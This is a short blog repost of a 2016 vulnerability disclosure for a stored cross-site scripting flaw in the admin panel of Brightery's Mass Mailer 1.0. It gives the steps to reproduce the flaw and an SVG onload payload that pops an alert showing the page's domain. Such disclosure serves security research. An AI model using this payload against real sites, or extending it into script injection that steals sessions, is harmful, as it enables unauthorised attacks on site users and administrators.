13 Haziran 2016 Pazartesi

Mass Mailer - Stored XSS Vuln.

11:38 Posted by Unknown
# Exploit Title: Mass Mailer Stored XSS Vuln.
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.brightery.com.eg/
# Demo Page: http://demo.brightery.com.eg/mass-mailer
# Version: 1.0

# Exploit:

< -- bug code started -- >

Go to the admin page. Add server from the top right menu. Use the payload: '"><svg/onload=confirm(
document.domain)>

And go to http://[SITE]/[script_path]/admin/servers

Here is your alert!

< -- end of the bug code -- >

#########################